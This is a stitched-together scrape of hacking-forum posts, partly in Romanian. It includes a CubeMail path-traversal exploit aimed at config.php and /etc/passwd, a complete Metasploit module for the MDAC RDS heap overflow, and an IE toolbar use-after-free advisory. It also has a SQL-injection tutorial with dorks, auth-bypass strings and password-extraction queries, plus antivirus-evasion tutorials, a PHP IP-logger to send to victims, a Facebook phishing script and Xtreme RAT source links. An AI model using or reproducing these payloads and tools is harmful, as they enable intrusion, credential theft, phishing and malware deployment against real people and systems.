$config['mysql_possible_character_sets'][$dump['sel_dump_encoding']] : 0; if ($action=='dl') { // Download of a backup file wanted $file='./'.$config['paths']['backup'].urldecode($_GET['f']); if (is_readable($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: '.(string) filesize($file)); flush(); $file=fopen($file,"rb"); while (!feof($file)) { print fread($file,round(100*1024)); flush(); } fclose($file); } //readfile($file); exit(); } */ Exploit: [url]http://192.168.0.15/learn/cubemail/filemanagement.php?action=dl&f=../../config.php[/url] [url]http://192.168.0.15/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00[/url] This technique can be used by attacker to download arbitraty files from site/server. Print screen: [url]http://s017.radikal.ru/i431/1204/e2/9075bb5fecd4.png[/url] Information Disclosure: Try to Direct access to this file: [url]http://192.168.0.15/learn/cubemail/restore.php[/url] Generates a lot of Notice's. [url]http://192.168.0.15/learn/cubemail/dump.php[/url] Generates a lot of Notice's. [url]http://192.168.0.15/learn/cubemail/refresh_dblist.php[/url] Fatal error: Call to undefined function MSD_mysql_connect() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\cubemail\inc\functions.php on line 147 NOTE: May be previous versions too affected but not tested. ================================ EOF ====================================== /AkaStep Live 1335567729 lam pus cu codul php dar nu s vazut nimic, tot negru si dupa aia lam editat

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow', 'Description' => %q{ This module can be used to execute arbitrary code on IIS servers that expose the /msadc/msadcs.dll Microsoft Data Access Components (MDAC) Remote Data Service (RDS) DataFactory service. The service is exploitable even when RDS is configured to deny remote connections (handsafe.reg). The service is vulnerable to a heap overflow where the RDS DataStub 'Content-Type' string is overly long. Microsoft Data Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable. }, 'Author' => 'patrick', 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ ['OSVDB', '14502'], ['BID', '6214'], ['CVE', '2002-1142'], ['MSB', 'ms02-065'], ['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html'] ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x09\x0a\x0b\x0d\x20:?<>=$\\/\"';=+%#&", 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'EXITFUNC' => 'seh', # stops IIS from crashing... hopefully }, 'Targets' => [ # patrickw tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0 [ 'Windows 2000 Pro English SP0', { 'Ret' => 0x75023783 } ], # jmp eax ws2help.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 20 2002' ) register_options( [ OptString.new('PATH', [ true, "The path to msadcs.dll", '/msadc/msadcs.dll']), ], self.class) end def check res = send_request_raw({ 'uri' => datastore['PATH'], 'method' => 'GET', }) if (res and res.code == 200) print_status("Server responded with HTTP #{res.code} OK") if (res.body =~ /Content-Type: application\/x-varg/) print_good("#{datastore['PATH']} matches fingerprint application\/x-varg") Exploit::CheckCode::Detected end else Exploit::CheckCode::Safe end end def exploit sploit = rand_text_alphanumeric(136) sploit[24,2] = Rex::Arch::X86.jmp_short(117) sploit << [target['Ret']].pack('V') sploit << payload.encoded data = 'Content-Type: ' + sploit res = send_request_raw({ 'uri' => datastore['PATH'] + '/AdvancedDataFactory.Query', 'headers' => { 'Content-Length' => data.length, }, 'method' => 'POST', 'data' => data, }) handler end end

CAL-2012-0023]Microsoft IE Developer Toolbar Remote Code Execution Vulnerability CVE ID: CVE-2012-1874 http://technet.microsoft.com/en-us/security/bulletin/ms12-037 http://blog.vulnhunt.com/index.php/2012/06/13/cal-2012-0023microsoft-ie-developer-toolbar-remote-code-execution-vulnerability/ 1 Affected Products ================= tested :Internet Explorer 9.0.8112.16421 also affected IE8 2 Vulnerability Details ===================== Code Audit Labs http://www.vulnhunt.com has discovered a use after free vulnerability in IE developer toolbar. IE developer toolbar register a global console object, and add bulitin members as CFunctionPointer with reference to console object, but not add reference count correctly. if access console object's property, it return a CFunctionPointer, so it cause a use after free vulnerability, which can cause Remote Code Execution. 3 Analysis ========= asm in jsdbgui.dll .text:1000B172 ; private: void __thiscall CConsole::AddAllBuiltinMembers(void) .text:1000B172 ?AddAllBuiltinMembers@CConsole@@AAEXXZ proc near .text:1000B172 ; CODE XREF: ATL::CComObject<CConsole>::CreateInstance(ATL::CComObject<CConsole> * *)+62p .text:1000B172 .text:1000B172 var_10 = dword ptr -10h .text:1000B172 var_4 = dword ptr -4 .text:1000B172 .text:1000B172 push 4 .text:1000B174 mov eax, offset loc_10039274 .text:1000B179 call __EH_prolog3 .text:1000B17E mov edi, ecx .text:1000B180 push 4 .text:1000B182 pop esi .text:1000B183 push esi ; dwBytes .text:1000B184 call ??2@YAPAXI@Z ; operator new(uint) .text:1000B189 pop ecx .text:1000B18A mov [ebp+var_10], eax .text:1000B18D and [ebp+var_4], 0 .text:1000B191 test eax, eax .text:1000B193 jz short loc_1000B1A3 .text:1000B195 push offset aLog ; "log" .text:1000B19A mov ecx, eax .text:1000B19C call ??0?$CStringT@GV?$StrTraitATL@GV?$ChTraitsCRT@G@ATL@@@ATL@@@ATL@@QAE@PBG@Z ; ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>(ushort const *) .text:1000B1A1 jmp short loc_1000B1A5 .text:1000B1A3 ; --------------------------------------------------------------------------- .text:1000B1A3 .text:1000B1A3 loc_1000B1A3: ; CODE XREF: CConsole::AddAllBuiltinMembers(void)+21j .text:1000B1A3 xor eax, eax .text:1000B1A5 .text:1000B1A5 loc_1000B1A5: ; CODE XREF: CConsole::AddAllBuiltinMembers(void)+2Fj .text:1000B1A5 push eax .text:1000B1A6 or ebx, 0FFFFFFFFh .text:1000B1A9 push 1 .text:1000B1AB mov ecx, edi .text:1000B1AD mov [ebp+var_4], ebx .text:1000B1B0 call ?AddBuiltinMethod@CParentExpando@@IAEXJPAV?$CStringT@GV?$StrTraitATL@GV?$ChTraitsCRT@G@ATL@@@ATL@@@ATL@@@Z ; CParentExpando::AddBuiltinMethod(long,ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>> *) .text:1000B1B5 push esi ; dwBytes .text:10021E5B push [ebp+arg_0] .text:10021E5E mov ecx, edi .text:10021E60 push esi .text:10021E61 call ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z ; CFunctionPointer::SetMethod(CParentExpando *,long) .text:10021E66 push [ebp+var_10] .text:10021E69 mov ecx, esi .text:10021E6B push [ebp+arg_0] .text:10021E6E call ?SetValue@CParentExpando@@IAEJJPAUIDispatch@@@Z ; CParentExpando::SetValue(long,IDispatch *) .text:10021E73 mov eax, [ebp+var_10] .text:1001B29B ; public: void __thiscall CFunctionPointer::SetMethod(class CParentExpando *, long) .text:1001B29B ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z proc near .text:1001B29B ; CODE XREF: CParentExpando::AddBuiltinMethod(long,ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>> *)+4Ap .text:1001B29B .text:1001B29B arg_0 = dword ptr 8 .text:1001B29B arg_4 = dword ptr 0Ch .text:1001B29B .text:1001B29B mov edi, edi .text:1001B29D push ebp .text:1001B29E mov ebp, esp .text:1001B2A0 mov eax, [ebp+arg_0] .text:1001B2A3 mov [ecx+8], eax .text:1001B2A6 mov eax, [ebp+arg_4] .text:1001B2A9 mov [ecx+0Ch], eax .text:1001B2AC pop ebp .text:1001B2AD retn 8 .text:1001B2AD ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z endp 4 Exploitable? ============ if overwrite freed memory with controlled content, combined with heap spray, can cause remote code execution. 5 Crash info: =============== ModLoad: 00110000 001c8000 C:\Program Files (x86)\Internet Explorer\iexplore.exe (1564.18e8): Access violation - code c0000005 (!!! second chance !!!) eax=0a1202d0 ebx=0365cc90 ecx=0a0afc70 edx=6e1effff esi=00000000 edi=0365cc48 eip=088b0000 esp=0365cbd8 ebp=0365cbf0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 088b0000 ?? ??? 0:005> kb 3 ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. 0365cbd4 6e1fb3ac 00000004 0365cc90 003a3718 0x88b0000 0365cbf0 5f69e657 0a1202d0 00000000 00000001 jsdbgui!CFunctionPointer::InvokeEx+0xbc 0365cc64 5f658fa8 0365cc90 0365cd48 00000008 jscript9!DispatchHelper::GetDispatchValue+0x9d 6 TIMELINE: ========== 2012/1/15 code audit labs of vulnhunt.com discover this issue 2012/1/20 we begin analyze 2012/2/20 we comfirmed this is an exploitable vulnerability. report to Microsoft 2012/2/21 Microsoft reply got the report. 2012/6/14 Microsoft public this bulletin. 7 About Code Audit Labs: ===================== Code Audit Labs secure your software,provide Professional include source code audit and binary code audit service. Code Audit Labs:" You create value for customer,We protect your value" http://www.VulnHunt.com

bun venit ..

Q what is sql injection? A injecting sql queries into another database or using queries to get auth bypass as an admin. part 1 : Basic sql injection Gaining auth bypass on an admin account. Most sites vulnerable to this are .asp First we need 2 find a site, start by opening google. Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect" There is a large number of google dork for basic sql injection. here is the best: "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" Now what to do once we get to our site. the site should look something like this : welcome to xxxxxxxxxx administrator panel username : password : so what we do here is in the username we always type "Admin" and for our password we type our sql injection here is a list of sql injections ' or '1'='1 ' or 'x'='x ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- 'or'1=1' there are many more but these are the best ones that i know of and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass. So your input should look like this username:Admin password:'or'1'='1 So click submit and you'r in NOTE not all sites are vulnerable. part 2: injecting sql queries to extract the admin username and password ok so lets say we have a site : http://www.xxxxx.com/index.php?catid=1 there is a list of dork 4 sites lyk this "inurl:index.php?catid=" "inurl:news.php?catid=" "inurl:index.php?id=" "inurl:news.php?id=" or the best in my view "full credit to qabandi for discovering this" "inurl:".php?catid=" site:xxx" So once you have you'r site http://www.xxxx.com/index.php?catid=1 now we add a ' to the end of the url so the site is http://www.xxxx.com/index.php?catid=1' if there is an error of some sort then it is vulnerable now we need to find the number of columns in the sql database so we type http://www.xxxx.com/index.php?catid=1 order by 1-- "no error" http://www.xxxx.com/index.php?catid=1 order by 2-- "no error" http://www.xxxx.com/index.php?catid=1 order by 3-- "no error" http://www.xxxx.com/index.php?catid=1 order by 4-- "no error" http://www.xxxx.com/index.php?catid=1 order by 5-- "error" so this database has 4 columns because we got an error on 5 on some databases there is 2 columns and on some 200 it varies so once we have the column number. we try the union function http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database" if you see some numbers like 1 2 3 4 on the screen or the column names it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db so now we need to info about the db so lets say the numbers 2 and 4 showed up on the screen so i will use my query on 2 http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4-- the db type and version will pop up on the screen if the db version is 4 or lower then to extract the password you will need these queries http://www.xxxx.com/index.php?catid=-1UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58), table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4-- this should display the table containing the admin username and password but if not then you will have to guess the table so once you have your table "or not" then type http://www.xxxx.com/index.php?catid=1UNION SELECT 1,password,3,4 FROM admintablename-- where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),ta ble_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess then once u have the right table name you should get the administrator password then just do the same thing but type username instead of password sometimes the password is hashed and you need to crack it. then see if you can get the admin panel if you cant then try the admin panel finder script here 404 Page Not Found now if the database is version 5 or up type http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- and that will display a list of all the tables once you have your table name type the same thing as 4 http://www.xxxx.com/index.php?catid=1UNION SELECT 1,password,3,4 FROM admintable-- then the same with username but now if it doesnt work far all those things just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing just play around with those but sometimes we also need to use the version() or version@@ so sometimes UNION SELECT version (),password,3,4 FROM admintable-- or UNION SELECT version @@,password,3,4 FROM admintable--

nu stiu cum de ai reusit sa-ti arunci netul, sau nu stiu ceai facut de tia cazut netul, dar programul e incercat de mine si merge destul de acceptabil, nu e maxim, dar merge..

A collection of videos and papers aswell as snippets have been put together over a few years releating to dodging antivirus scanners. Swf videos will need to be played via your web browser or supported player. Hex Edit Finding Signatures Detected In Malware_Fifo.avi hex edit bifrost 01.txt hex edit bifrost 02.txt Hex Editing #3.pdf Hex Editing a Crypter.swf Ntpacker ud stub making.doc Binding ud binder by The Ozz.pdf Entry Point Changing Entry Point Changing #1.pdf Entry Point Changing by Delikon.pdf EP tuto.swf Manual Packing BasicNOPcrackingVideoIDEspinner.avi bifrost_ud.avi Furax Undetected Video.avi Manual packing #2.pdf ManualPacking.avi ozzis_new_vid_1.avi xor2.flv Packing kav-proactivasI_en.swf Packing Bifrost.swf registro_en.swf Splitting SignatureZero Video Tutorial by iNs.avi Download: Part 1 https://rapidshare.com/#!download|457p7|1564372942|Avioding_The_Av.part1.rar|100431|0|0 Part 2 https://rapidshare.com/#!download|457p4|3856498573|Avioding_The_Av.part2.rar|100431|0|0 Part 3 https://rapidshare.com/#!download|457p7|191180330|Avioding_The_Av.part3.rar|61772|0|0 Enjoy...

download : FreakShare - Easy One-Click File Hosting scan : novirusthanks Report date: 2012-09-09 21:01:59 (GMT 1) File name: udpunicorn-exe File size: 373248 bytes MD5 hash: c3e859051910f00d525df355a294ae56 SHA1 hash: 0e98d7bf8dddc91b86d5058af19f7c620854ae44 Detection rate: 0 on 14 (0%) Status: CLEAN Asquared 21:01:59 5.1.0.3 Avast 21:01:59 5.0 AVG 21:01:59 10.0.0.1190 Avira 21:01:59 7.11.7.12 BitDefender 21:01:59 7.0.0.2555 ClamAV 21:01:59 0.97.4 Comodo 21:01:59 1.0 DrWeb 21:01:59 5.0.2 Fprot 21:01:59 6.0 IkarusT3 21:01:59 T31001097 Panda 21:01:59 10.0.3.0 STOPZilla 21:01:59 5.0.0.0 TrendMicro 21:01:59 9.200.0.1012 VBA32 21:01:59 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org si aici un cod foarte interesant Hello I'll show you get the ip with an image in php because as you know the IP of a person is the most important d q there if we need any kind of attack or some pentesting It's simple, open a notepad and paste this code: <? $ file = "log.txt" , / / name of the file where we keep reports $ ip = $ _SERVER *** 91 ; "REMOTE_ADDR" *** 93 ;; / / stored in the ip variable $ date = date ( "Ymd H: i: s" ), / / date and time (usually server) $ system = $ _SERVER *** 91 ; 'HTTP_USER_AGENT' *** 93 ;; / / this will generate several data browser and operating system $ conproxy = $ _SERVER *** 91 ; "HTTP_X_FORWARDED_FOR" *** 93 ;; / / if using proxy to hide the real ip here would be $ log = "DATE: $ Date System: $ IP: $ ip IPPROXY: $ conproxy " ; $ fp = fopen ( $ file , "a" ); fwrite ( $ fp , $ log ); fclose ( $ fp ); Header ( "Content-type: link of the image is put any units ECHO $ imagen_png ; ?> Ready now saved with php ext now create another file called "log.txt" in the same folder set up the two files to the hosting page and send it to your victim that's all. Greetings

Written completely in Perl, this suite of tools covers a lot of the basics for penetration testing and vulnerability detection automation. This Suite (formerly known as the "pCrack Suite") of tools is used primarily or web application vulnerability testing. It include various Tools: Hellfire - LFI Automation Tool, LogInjector – Code Injection Tool for Web Server Logs (LFI Attack) Smsi (SimplyMySQLi) - Simple Mysql Injector Xss Tools like StrEncode Xss String Encoding Tool. Video Demos Created by Camtasia Studio 7 http://weaknetlabs.com/pcrack/pcrack.mp4 Download Downloads - pweb-suite - Perl based web application penetration testing tools - Google Project Hosting Author(s) Trevelyn - weaknetlabs[-at-]gmail

http://www.youtube.com/watch?v=WZ1ySR-IFAE&feature=player_embedded acest tutorial explica cum sa face un scam de facebook ca sa obtinem datele de login de la victima ! Código "robando.php": download robando.php este in spaniola, dar se intelege bine de tot.

download https://dl.dropbox.com/u/81704696/Xtreme%20RAT%20source%20code%20.rar pass: level-23.biz Xtreme RAT Source Code Price: €350 EUR https://sites.google.com/site/nxtremerat/ profitati de ocazie reupload ok edit// Explaination by flash .swf how the prog works bY Kombaal SourceForge http://www.mediafire.com/?mdqjc5l4f0yd6wa edit// 1300 de vizitatori, nici un comentariu, nici un like, absolut nimic, asai ca e trist cand vezi asa ceva asta e